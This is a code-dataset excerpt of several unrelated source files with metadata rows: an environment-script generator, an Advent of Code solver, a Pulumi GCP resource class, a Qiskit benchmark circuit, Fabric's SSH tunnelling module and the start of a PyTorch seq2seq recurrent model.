"MIT"
] | null | null | null |
import os
from logger import log, DEBUG
class ScriptGenerator(object):
    def __init__(self, environment_vars=None):
        # avoid sharing a mutable default argument between instances
        self.env = environment_vars if environment_vars is not None else {}
def script(self, language='sh'):
header_lines = [
'#!/bin/%s' % language,
'# Auto-generated by projectenv'
]
env_lines = []
for k, v in self.env.iteritems():
line = getattr(self, '_write_env_var_%s' % language)(k, v)
env_lines.append(line)
# We are relying on the fact that sorting is stable as of python>=2.3
env_lines.sort(key=self._script_order_key)
return '\n'.join(header_lines + env_lines)
def write(self, file_name):
for language in ['sh', 'csh']:
self._write(file_name, language)
def _write(self, file_name, language):
file_name += '.' + language
log('writing script', file_name)
        with open(file_name, 'w+') as f:
            script = self.script(language)
            log(None, ' >> ' + script.replace('\n', '\n >> ') + '\n')
            if not DEBUG:
                f.write(script + '\n')
def _write_env_var_sh(self, name, value):
if value:
return 'export %s=%s' % (name, value)
else:
return 'unset %s' % name
def _write_env_var_csh(self, name, value):
if value:
return 'setenv %s %s' % (name, value)
else:
return 'unsetenv %s' % name
def _script_order_key(self, line):
"""
export/setenv commands must be in the correct order to prevent the
possibility of restoring an environment variable to the wrong value
"""
# the original environment vars should be saved first
if (line.startswith('export _PROJECTENV_') or
line.startswith('setenv _PROJECTENV_')):
return 1
# next the remaining environment vars should be set
elif line.startswith('export') or line.startswith('setenv'):
return 2
# unsetting the prefixed environment variables should be done last
elif line.startswith('unset _PROJECTENV_') or line.startswith('unsetenv _PROJECTENV_'):
return 4
# unsetting environment vars only happen once all of the environment
# vars that should be set have been set
else:
return 3
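# A minimal usage sketch (hypothetical variable names and values):
#   gen = ScriptGenerator({'PROJECT_ROOT': '/srv/app', '_PROJECTENV_OLD_PATH': '/usr/bin'})
#   gen.write('activate')  # emits activate.sh and activate.csh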
| 33.493151
| 95
| 0.570961
|
9d23a9a2b1432fe22a146bd3e0193ea953b20eac
| 2,218
|
py
|
Python
|
2021/aoc_2021_03/aoc_2021_03.py
|
ericcolton/AdventOfCode
|
58bdf8886d1d6cea5faeee74248c10ddaf97a93b
|
[
"MIT"
] | null | null | null |
2021/aoc_2021_03/aoc_2021_03.py
|
ericcolton/AdventOfCode
|
58bdf8886d1d6cea5faeee74248c10ddaf97a93b
|
[
"MIT"
] | null | null | null |
2021/aoc_2021_03/aoc_2021_03.py
|
ericcolton/AdventOfCode
|
58bdf8886d1d6cea5faeee74248c10ddaf97a93b
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
"""
Advent of Code 2021 Day 3: Dive!
https://adventofcode.com/2021/day/3
Solution by Eric Colton
"""
from typing import List
def parse_input_data(raw_input: List[str]) -> List[str]:
return [line.rstrip() for line in raw_input]
def convert_binary_to_decimal(binary_str: str) -> int:
rv = 0
for bit in binary_str:
rv *= 2
if bit == "1":
rv += 1
return rv
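# Note: equivalent to int(binary_str, 2); spelled out here for clarity.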
def calculate_gamma_epsilon(report: List[str]) -> tuple:
bit_counts = [0] * len(report[0])
for line in report:
for i, bit in enumerate(line):
if bit == "1":
bit_counts[i] += 1
elif bit != "0":
raise Exception("Expected only 1 or 0")
gamma, epsilon = "", ""
for count in bit_counts:
gamma += "1" if count > len(report) / 2 else "0"
epsilon += "0" if count > len(report) / 2 else "1"
return (convert_binary_to_decimal(gamma), convert_binary_to_decimal(epsilon))
def calculate_oxygen_co2(report: List[str], count_majority: bool) -> int:
filtered_report = report
for i in range(len(report[0])):
count = sum([1 if line[i] == "1" else 0 for line in filtered_report])
if count_majority:
filter_bit = "1" if count >= len(filtered_report) / 2 else "0"
else:
filter_bit = "0" if count >= len(filtered_report) / 2 else "1"
filtered_report = list(filter(lambda x: x[i] == filter_bit, filtered_report))
if len(filtered_report) == 1:
return convert_binary_to_decimal(filtered_report[0])
if __name__ == '__main__':
    input_filename = __file__[:-len('.py')] + '_input.txt'  # str.strip('.py') would strip characters, not the suffix
with open(input_filename, 'r') as file:
raw_input = file.readlines()
report = parse_input_data(raw_input)
(gamma, epsilon) = calculate_gamma_epsilon(report)
part_1 = gamma * epsilon
assert part_1 == 1307354
print(f"The solution to Part 1 is {part_1}")
oxygen = calculate_oxygen_co2(report, True)
co2 = calculate_oxygen_co2(report, False)
part_2 = oxygen * co2
assert part_2 == 482500
print(f"The solution to Part 2 is {part_2}")
| 33.606061
| 85
| 0.609107
|
ebd2bbedefdadc3fbe4e93fc0a90b5a0f54d0043
| 16,326
|
py
|
Python
|
sdk/python/pulumi_google_native/compute/beta/resource_policy.py
|
AaronFriel/pulumi-google-native
|
75d1cda425e33d4610348972cd70bddf35f1770d
|
[
"Apache-2.0"
] | 44
|
2021-04-18T23:00:48.000Z
|
2022-02-14T17:43:15.000Z
|
sdk/python/pulumi_google_native/compute/beta/resource_policy.py
|
AaronFriel/pulumi-google-native
|
75d1cda425e33d4610348972cd70bddf35f1770d
|
[
"Apache-2.0"
] | 354
|
2021-04-16T16:48:39.000Z
|
2022-03-31T17:16:39.000Z
|
sdk/python/pulumi_google_native/compute/beta/resource_policy.py
|
AaronFriel/pulumi-google-native
|
75d1cda425e33d4610348972cd70bddf35f1770d
|
[
"Apache-2.0"
] | 8
|
2021-04-24T17:46:51.000Z
|
2022-01-05T10:40:21.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['ResourcePolicyArgs', 'ResourcePolicy']
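# A usage sketch (hypothetical resource and argument names; this file is
# generated, so the classes below are the authoritative surface):
#   policy = ResourcePolicy("nightly", region="us-central1",
#                           description="example resource policy")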
@pulumi.input_type
class ResourcePolicyArgs:
def __init__(__self__, *,
region: pulumi.Input[str],
description: Optional[pulumi.Input[str]] = None,
group_placement_policy: Optional[pulumi.Input['ResourcePolicyGroupPlacementPolicyArgs']] = None,
instance_schedule_policy: Optional[pulumi.Input['ResourcePolicyInstanceSchedulePolicyArgs']] = None,
name: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
request_id: Optional[pulumi.Input[str]] = None,
snapshot_schedule_policy: Optional[pulumi.Input['ResourcePolicySnapshotSchedulePolicyArgs']] = None):
"""
The set of arguments for constructing a ResourcePolicy resource.
:param pulumi.Input['ResourcePolicyGroupPlacementPolicyArgs'] group_placement_policy: Resource policy for instances for placement configuration.
:param pulumi.Input['ResourcePolicyInstanceSchedulePolicyArgs'] instance_schedule_policy: Resource policy for scheduling instance operations.
:param pulumi.Input[str] name: The name of the resource, provided by the client when initially creating the resource. The resource name must be 1-63 characters long, and comply with RFC1035. Specifically, the name must be 1-63 characters long and match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?` which means the first character must be a lowercase letter, and all following characters must be a dash, lowercase letter, or digit, except the last character, which cannot be a dash.
:param pulumi.Input['ResourcePolicySnapshotSchedulePolicyArgs'] snapshot_schedule_policy: Resource policy for persistent disks for creating snapshots.
"""
pulumi.set(__self__, "region", region)
if description is not None:
pulumi.set(__self__, "description", description)
if group_placement_policy is not None:
pulumi.set(__self__, "group_placement_policy", group_placement_policy)
if instance_schedule_policy is not None:
pulumi.set(__self__, "instance_schedule_policy", instance_schedule_policy)
if name is not None:
pulumi.set(__self__, "name", name)
if project is not None:
pulumi.set(__self__, "project", project)
if request_id is not None:
pulumi.set(__self__, "request_id", request_id)
if snapshot_schedule_policy is not None:
pulumi.set(__self__, "snapshot_schedule_policy", snapshot_schedule_policy)
@property
@pulumi.getter
def region(self) -> pulumi.Input[str]:
return pulumi.get(self, "region")
@region.setter
def region(self, value: pulumi.Input[str]):
pulumi.set(self, "region", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="groupPlacementPolicy")
def group_placement_policy(self) -> Optional[pulumi.Input['ResourcePolicyGroupPlacementPolicyArgs']]:
"""
Resource policy for instances for placement configuration.
"""
return pulumi.get(self, "group_placement_policy")
@group_placement_policy.setter
def group_placement_policy(self, value: Optional[pulumi.Input['ResourcePolicyGroupPlacementPolicyArgs']]):
pulumi.set(self, "group_placement_policy", value)
@property
@pulumi.getter(name="instanceSchedulePolicy")
def instance_schedule_policy(self) -> Optional[pulumi.Input['ResourcePolicyInstanceSchedulePolicyArgs']]:
"""
Resource policy for scheduling instance operations.
"""
return pulumi.get(self, "instance_schedule_policy")
@instance_schedule_policy.setter
def instance_schedule_policy(self, value: Optional[pulumi.Input['ResourcePolicyInstanceSchedulePolicyArgs']]):
pulumi.set(self, "instance_schedule_policy", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the resource, provided by the client when initially creating the resource. The resource name must be 1-63 characters long, and comply with RFC1035. Specifically, the name must be 1-63 characters long and match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?` which means the first character must be a lowercase letter, and all following characters must be a dash, lowercase letter, or digit, except the last character, which cannot be a dash.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
@property
@pulumi.getter(name="requestId")
def request_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "request_id")
@request_id.setter
def request_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "request_id", value)
@property
@pulumi.getter(name="snapshotSchedulePolicy")
def snapshot_schedule_policy(self) -> Optional[pulumi.Input['ResourcePolicySnapshotSchedulePolicyArgs']]:
"""
Resource policy for persistent disks for creating snapshots.
"""
return pulumi.get(self, "snapshot_schedule_policy")
@snapshot_schedule_policy.setter
def snapshot_schedule_policy(self, value: Optional[pulumi.Input['ResourcePolicySnapshotSchedulePolicyArgs']]):
pulumi.set(self, "snapshot_schedule_policy", value)
class ResourcePolicy(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
group_placement_policy: Optional[pulumi.Input[pulumi.InputType['ResourcePolicyGroupPlacementPolicyArgs']]] = None,
instance_schedule_policy: Optional[pulumi.Input[pulumi.InputType['ResourcePolicyInstanceSchedulePolicyArgs']]] = None,
name: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
request_id: Optional[pulumi.Input[str]] = None,
snapshot_schedule_policy: Optional[pulumi.Input[pulumi.InputType['ResourcePolicySnapshotSchedulePolicyArgs']]] = None,
__props__=None):
"""
Creates a new resource policy.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['ResourcePolicyGroupPlacementPolicyArgs']] group_placement_policy: Resource policy for instances for placement configuration.
:param pulumi.Input[pulumi.InputType['ResourcePolicyInstanceSchedulePolicyArgs']] instance_schedule_policy: Resource policy for scheduling instance operations.
:param pulumi.Input[str] name: The name of the resource, provided by the client when initially creating the resource. The resource name must be 1-63 characters long, and comply with RFC1035. Specifically, the name must be 1-63 characters long and match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?` which means the first character must be a lowercase letter, and all following characters must be a dash, lowercase letter, or digit, except the last character, which cannot be a dash.
:param pulumi.Input[pulumi.InputType['ResourcePolicySnapshotSchedulePolicyArgs']] snapshot_schedule_policy: Resource policy for persistent disks for creating snapshots.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ResourcePolicyArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Creates a new resource policy.
:param str resource_name: The name of the resource.
:param ResourcePolicyArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ResourcePolicyArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
group_placement_policy: Optional[pulumi.Input[pulumi.InputType['ResourcePolicyGroupPlacementPolicyArgs']]] = None,
instance_schedule_policy: Optional[pulumi.Input[pulumi.InputType['ResourcePolicyInstanceSchedulePolicyArgs']]] = None,
name: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
request_id: Optional[pulumi.Input[str]] = None,
snapshot_schedule_policy: Optional[pulumi.Input[pulumi.InputType['ResourcePolicySnapshotSchedulePolicyArgs']]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ResourcePolicyArgs.__new__(ResourcePolicyArgs)
__props__.__dict__["description"] = description
__props__.__dict__["group_placement_policy"] = group_placement_policy
__props__.__dict__["instance_schedule_policy"] = instance_schedule_policy
__props__.__dict__["name"] = name
__props__.__dict__["project"] = project
if region is None and not opts.urn:
raise TypeError("Missing required property 'region'")
__props__.__dict__["region"] = region
__props__.__dict__["request_id"] = request_id
__props__.__dict__["snapshot_schedule_policy"] = snapshot_schedule_policy
__props__.__dict__["creation_timestamp"] = None
__props__.__dict__["kind"] = None
__props__.__dict__["resource_status"] = None
__props__.__dict__["self_link"] = None
__props__.__dict__["status"] = None
super(ResourcePolicy, __self__).__init__(
'google-native:compute/beta:ResourcePolicy',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'ResourcePolicy':
"""
Get an existing ResourcePolicy resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = ResourcePolicyArgs.__new__(ResourcePolicyArgs)
__props__.__dict__["creation_timestamp"] = None
__props__.__dict__["description"] = None
__props__.__dict__["group_placement_policy"] = None
__props__.__dict__["instance_schedule_policy"] = None
__props__.__dict__["kind"] = None
__props__.__dict__["name"] = None
__props__.__dict__["region"] = None
__props__.__dict__["resource_status"] = None
__props__.__dict__["self_link"] = None
__props__.__dict__["snapshot_schedule_policy"] = None
__props__.__dict__["status"] = None
return ResourcePolicy(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="creationTimestamp")
def creation_timestamp(self) -> pulumi.Output[str]:
"""
Creation timestamp in RFC3339 text format.
"""
return pulumi.get(self, "creation_timestamp")
@property
@pulumi.getter
def description(self) -> pulumi.Output[str]:
return pulumi.get(self, "description")
@property
@pulumi.getter(name="groupPlacementPolicy")
def group_placement_policy(self) -> pulumi.Output['outputs.ResourcePolicyGroupPlacementPolicyResponse']:
"""
Resource policy for instances for placement configuration.
"""
return pulumi.get(self, "group_placement_policy")
@property
@pulumi.getter(name="instanceSchedulePolicy")
def instance_schedule_policy(self) -> pulumi.Output['outputs.ResourcePolicyInstanceSchedulePolicyResponse']:
"""
Resource policy for scheduling instance operations.
"""
return pulumi.get(self, "instance_schedule_policy")
@property
@pulumi.getter
def kind(self) -> pulumi.Output[str]:
"""
Type of the resource. Always compute#resource_policies for resource policies.
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the resource, provided by the client when initially creating the resource. The resource name must be 1-63 characters long, and comply with RFC1035. Specifically, the name must be 1-63 characters long and match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?` which means the first character must be a lowercase letter, and all following characters must be a dash, lowercase letter, or digit, except the last character, which cannot be a dash.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def region(self) -> pulumi.Output[str]:
return pulumi.get(self, "region")
@property
@pulumi.getter(name="resourceStatus")
def resource_status(self) -> pulumi.Output['outputs.ResourcePolicyResourceStatusResponse']:
"""
The system status of the resource policy.
"""
return pulumi.get(self, "resource_status")
@property
@pulumi.getter(name="selfLink")
def self_link(self) -> pulumi.Output[str]:
"""
Server-defined fully-qualified URL for this resource.
"""
return pulumi.get(self, "self_link")
@property
@pulumi.getter(name="snapshotSchedulePolicy")
def snapshot_schedule_policy(self) -> pulumi.Output['outputs.ResourcePolicySnapshotSchedulePolicyResponse']:
"""
Resource policy for persistent disks for creating snapshots.
"""
return pulumi.get(self, "snapshot_schedule_policy")
@property
@pulumi.getter
def status(self) -> pulumi.Output[str]:
"""
The status of resource policy creation.
"""
return pulumi.get(self, "status")
| 48.734328
| 496
| 0.680081
|
fbb04d06fc0062da7a3a7e1b47bcb59a8a4a238b
| 4,222
|
py
|
Python
|
benchmark/startQiskit_noisy3091.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
benchmark/startQiskit_noisy3091.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
benchmark/startQiskit_noisy3091.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
# qubit number=4
# total number=38
import cirq
import qiskit
from qiskit.providers.aer import QasmSimulator
from qiskit.test.mock import FakeVigo
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from math import log2
import numpy as np
import networkx as nx
def bitwise_xor(s: str, t: str) -> str:
length = len(s)
res = []
for i in range(length):
res.append(str(int(s[i]) ^ int(t[i])))
return ''.join(res[::-1])
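# NOTE: the XOR result is returned bit-reversed relative to the inputs
# (res[::-1] above), e.g. bitwise_xor("101", "110") == "110".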
def bitwise_dot(s: str, t: str) -> str:
length = len(s)
res = 0
for i in range(length):
res += int(s[i]) * int(t[i])
return str(res % 2)
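# e.g. bitwise_dot("101", "110") == "1" (the inner product of the bit strings, mod 2).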
def build_oracle(n: int, f) -> QuantumCircuit:
# implement the oracle O_f
# NOTE: use multi_control_toffoli_gate ('noancilla' mode)
# https://qiskit.org/documentation/_modules/qiskit/aqua/circuits/gates/multi_control_toffoli_gate.html
# https://quantumcomputing.stackexchange.com/questions/3943/how-do-you-implement-the-toffoli-gate-using-only-single-qubit-and-cnot-gates
# https://quantumcomputing.stackexchange.com/questions/2177/how-can-i-implement-an-n-bit-toffoli-gate
controls = QuantumRegister(n, "ofc")
target = QuantumRegister(1, "oft")
oracle = QuantumCircuit(controls, target, name="Of")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
oracle.mct(controls, target[0], None, mode='noancilla')
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.barrier()
return oracle
def make_circuit(n:int,f) -> QuantumCircuit:
# circuit begin
input_qubit = QuantumRegister(n,"qc")
classical = ClassicalRegister(n, "qm")
prog = QuantumCircuit(input_qubit, classical)
prog.h(input_qubit[3]) # number=30
prog.cz(input_qubit[0],input_qubit[3]) # number=31
prog.h(input_qubit[3]) # number=32
prog.cx(input_qubit[0],input_qubit[3]) # number=33
prog.x(input_qubit[3]) # number=34
prog.cx(input_qubit[0],input_qubit[3]) # number=35
prog.cx(input_qubit[0],input_qubit[3]) # number=29
prog.h(input_qubit[1]) # number=2
prog.z(input_qubit[2]) # number=36
prog.h(input_qubit[2]) # number=3
prog.h(input_qubit[3]) # number=4
prog.h(input_qubit[2]) # number=37
prog.y(input_qubit[3]) # number=12
prog.h(input_qubit[0]) # number=5
oracle = build_oracle(n-1, f)
prog.append(oracle.to_gate(),[input_qubit[i] for i in range(n-1)]+[input_qubit[n-1]])
prog.h(input_qubit[1]) # number=6
prog.h(input_qubit[2]) # number=7
prog.h(input_qubit[3]) # number=8
prog.h(input_qubit[0]) # number=9
prog.y(input_qubit[2]) # number=10
prog.y(input_qubit[2]) # number=11
prog.cx(input_qubit[1],input_qubit[0]) # number=13
prog.h(input_qubit[0]) # number=15
prog.cz(input_qubit[1],input_qubit[0]) # number=16
prog.h(input_qubit[1]) # number=20
prog.h(input_qubit[2]) # number=19
prog.cx(input_qubit[3],input_qubit[0]) # number=24
prog.z(input_qubit[3]) # number=25
prog.cx(input_qubit[3],input_qubit[0]) # number=26
prog.h(input_qubit[0]) # number=17
prog.cx(input_qubit[2],input_qubit[0]) # number=21
prog.x(input_qubit[1]) # number=23
prog.cx(input_qubit[2],input_qubit[0]) # number=22
# circuit end
for i in range(n):
prog.measure(input_qubit[i], classical[i])
return prog
if __name__ == '__main__':
a = "111"
b = "0"
f = lambda rep: bitwise_xor(bitwise_dot(a, rep), b)
prog = make_circuit(4,f)
backend = FakeVigo()
    sample_shot = 8000
info = execute(prog, backend=backend, shots=sample_shot).result().get_counts()
backend = FakeVigo()
    circuit1 = transpile(prog, backend, optimization_level=2)
writefile = open("../data/startQiskit_noisy3091.csv","w")
print(info,file=writefile)
print("results end", file=writefile)
print(circuit1.__len__(),file=writefile)
print(circuit1,file=writefile)
writefile.close()
| 34.606557
| 140
| 0.653482
|
a19d47641c73b3d95d58f5d189c52a88e024dd0c
| 5,677
|
py
|
Python
|
fabric/tunnels.py
|
daobook/fabric
|
4318a501f5ad9def888a99fe7f817d12a204d526
|
[
"BSD-2-Clause"
] | null | null | null |
fabric/tunnels.py
|
daobook/fabric
|
4318a501f5ad9def888a99fe7f817d12a204d526
|
[
"BSD-2-Clause"
] | null | null | null |
fabric/tunnels.py
|
daobook/fabric
|
4318a501f5ad9def888a99fe7f817d12a204d526
|
[
"BSD-2-Clause"
] | null | null | null |
"""
Tunnel and connection forwarding internals.
If you're looking for simple, end-user-focused connection forwarding, please
see `.Connection`, e.g. `.Connection.forward_local`.
"""
import errno
import select
import socket
import time
from threading import Event
from invoke.exceptions import ThreadException
from invoke.util import ExceptionHandlingThread
class TunnelManager(ExceptionHandlingThread):
"""
Thread subclass for tunnelling connections over SSH between two endpoints.
Specifically, one instance of this class is sufficient to sit around
forwarding any number of individual connections made to one end of the
tunnel or the other. If you need to forward connections between more than
one set of ports, you'll end up instantiating multiple TunnelManagers.
Wraps a `~paramiko.transport.Transport`, which should already be connected
to the remote server.
.. versionadded:: 2.0
"""
def __init__(
self,
local_host,
local_port,
remote_host,
remote_port,
transport,
finished,
):
super(TunnelManager, self).__init__()
self.local_address = (local_host, local_port)
self.remote_address = (remote_host, remote_port)
self.transport = transport
self.finished = finished
def _run(self):
# Track each tunnel that gets opened during our lifetime
tunnels = []
# Set up OS-level listener socket on forwarded port
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# TODO: why do we want REUSEADDR exactly? and is it portable?
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# NOTE: choosing to deal with nonblocking semantics and a fast loop,
# versus an older approach which blocks & expects outer scope to cause
# a socket exception by close()ing the socket.
sock.setblocking(0)
sock.bind(self.local_address)
sock.listen(1)
while not self.finished.is_set():
# Main loop-wait: accept connections on the local listener
# NOTE: EAGAIN means "you're nonblocking and nobody happened to
# connect at this point in time"
try:
tun_sock, local_addr = sock.accept()
# Set TCP_NODELAY to match OpenSSH's forwarding socket behavior
tun_sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
except socket.error as e:
                if e.errno == errno.EAGAIN:
# TODO: make configurable
time.sleep(0.01)
continue
raise
# Set up direct-tcpip channel on server end
# TODO: refactor w/ what's used for gateways
channel = self.transport.open_channel(
"direct-tcpip", self.remote_address, local_addr
)
# Set up 'worker' thread for this specific connection to our
# tunnel, plus its dedicated signal event (which will appear as a
# public attr, no need to track both independently).
finished = Event()
tunnel = Tunnel(channel=channel, sock=tun_sock, finished=finished)
tunnel.start()
tunnels.append(tunnel)
exceptions = []
        # Propagate shutdown signal to all tunnels & wait for closure
# TODO: would be nice to have some output or at least logging here,
# especially for "sets up a handful of tunnels" use cases like
# forwarding nontrivial HTTP traffic.
for tunnel in tunnels:
tunnel.finished.set()
tunnel.join()
wrapper = tunnel.exception()
if wrapper:
exceptions.append(wrapper)
# Handle exceptions
if exceptions:
raise ThreadException(exceptions)
# All we have left to close is our own sock.
# TODO: use try/finally?
sock.close()
class Tunnel(ExceptionHandlingThread):
"""
Bidirectionally forward data between an SSH channel and local socket.
.. versionadded:: 2.0
"""
def __init__(self, channel, sock, finished):
self.channel = channel
self.sock = sock
self.finished = finished
self.socket_chunk_size = 1024
self.channel_chunk_size = 1024
super(Tunnel, self).__init__()
def _run(self):
try:
empty_sock, empty_chan = None, None
while not self.finished.is_set():
r, w, x = select.select([self.sock, self.channel], [], [], 1)
if self.sock in r:
empty_sock = self.read_and_write(
self.sock, self.channel, self.socket_chunk_size
)
if self.channel in r:
empty_chan = self.read_and_write(
self.channel, self.sock, self.channel_chunk_size
)
if empty_sock or empty_chan:
break
finally:
self.channel.close()
self.sock.close()
def read_and_write(self, reader, writer, chunk_size):
"""
Read ``chunk_size`` from ``reader``, writing result to ``writer``.
Returns ``None`` if successful, or ``True`` if the read was empty.
.. versionadded:: 2.0
"""
data = reader.recv(chunk_size)
if len(data) == 0:
return True
writer.sendall(data)
| 35.93038
| 80
| 0.589044
|
c48225cd7e2f181c1e395269c6d28ef9e4d62454
| 574
|
py
|
Python
|
publications/datasets/mappings/__init__.py
|
Alzpeta/publications-api
|
6332c1329b22ff4f494085f042e893a8a94e33df
|
[
"MIT"
] | null | null | null |
publications/datasets/mappings/__init__.py
|
Alzpeta/publications-api
|
6332c1329b22ff4f494085f042e893a8a94e33df
|
[
"MIT"
] | 13
|
2021-01-21T14:35:29.000Z
|
2021-09-01T07:53:27.000Z
|
publications/datasets/mappings/__init__.py
|
Alzpeta/publications-api
|
6332c1329b22ff4f494085f042e893a8a94e33df
|
[
"MIT"
] | 4
|
2021-02-23T18:17:35.000Z
|
2021-07-23T14:54:13.000Z
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2020 CESNET.
#
# CESNET OA Publication Repository is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
#
"""Mappings.
Mappings define how records and their fields will be indexed in Elasticsearch.
The provided publications-object-v1.0.0.json file is an example of how to index records
in Elasticsearch. You need to provide one mapping per major version of
Elasticsearch you want to support.
"""
from __future__ import absolute_import, print_function
| 31.888889
| 93
| 0.771777
|
caa86c6d5e4874b344d7dd92209b75f5f89ec574
| 10,363
|
py
|
Python
|
seq2seq/models/recurrent.py
|
marvis/seq2seq.pytorch
|
9b27c4d70666bf1ed9cbbe4f1ef0a765c3465530
|
[
"MIT"
] | null | null | null |
seq2seq/models/recurrent.py
|
marvis/seq2seq.pytorch
|
9b27c4d70666bf1ed9cbbe4f1ef0a765c3465530
|
[
"MIT"
] | null | null | null |
seq2seq/models/recurrent.py
|
marvis/seq2seq.pytorch
|
9b27c4d70666bf1ed9cbbe4f1ef0a765c3465530
|
[
"MIT"
] | 1
|
2021-01-07T10:37:31.000Z
|
2021-01-07T10:37:31.000Z
|
# Partially adapted from https://github.com/OpenNMT/OpenNMT-py
import torch
import torch.nn as nn
from torch.autograd import Variable
from torch.nn.utils.rnn import pad_packed_sequence as unpack
from torch.nn.utils.rnn import pack_padded_sequence as pack
from torch.nn.utils.rnn import PackedSequence
from .seq2seq import Seq2Seq
from .attention import GlobalAttention
def bridge_bidirectional_hidden(hidden):
# the bidirectional hidden is (layers*directions) x batch x dim
# we need to convert it to layers x batch x (directions*dim)
num_layers = hidden.size(0) // 2
batch_size, hidden_size = hidden.size(1), hidden.size(2)
return hidden.view(num_layers, 2, batch_size, hidden_size) \
.transpose(1, 2).contiguous() \
.view(num_layers, batch_size, hidden_size * 2)
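# e.g. a 2-layer bidirectional LSTM hidden state of shape (4, batch, dim)
# comes back as (2, batch, 2 * dim).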
class RecurrentEncoder(nn.Module):
def __init__(self, vocab_size, hidden_size=128,
num_layers=1, bias=True, batch_first=False,
dropout=0, bidirectional=False, rnn=nn.LSTM):
super(RecurrentEncoder, self).__init__()
self.layers = num_layers
self.bidirectional = bidirectional
self.hidden_size = hidden_size
embedding_size = hidden_size
if bidirectional:
assert hidden_size % 2 == 0
self.hidden_size = hidden_size // 2
self.embedder = nn.Embedding(vocab_size,
embedding_size,
padding_idx=0)
self.rnn = rnn(embedding_size, self.hidden_size,
num_layers=num_layers, bias=bias,
batch_first=batch_first,
dropout=dropout, bidirectional=bidirectional)
def forward(self, inputs, hidden=None):
if isinstance(inputs, tuple):
# Lengths data is wrapped inside a Variable.
lengths = inputs[1].data.view(-1).tolist()
emb = pack(self.embedder(inputs[0]), lengths)
else:
emb = self.embedder(inputs)
outputs, hidden_t = self.rnn(emb, hidden)
if isinstance(inputs, tuple):
outputs = unpack(outputs)[0]
return outputs, hidden_t
class RecurrentDecoder(nn.Module):
def __init__(self, vocab_size, hidden_size=128,
num_layers=1, bias=True, batch_first=False,
dropout=0, rnn=nn.LSTM, tie_embedding=True):
super(RecurrentDecoder, self).__init__()
self.layers = num_layers
self.hidden_size = hidden_size
embedding_size = hidden_size
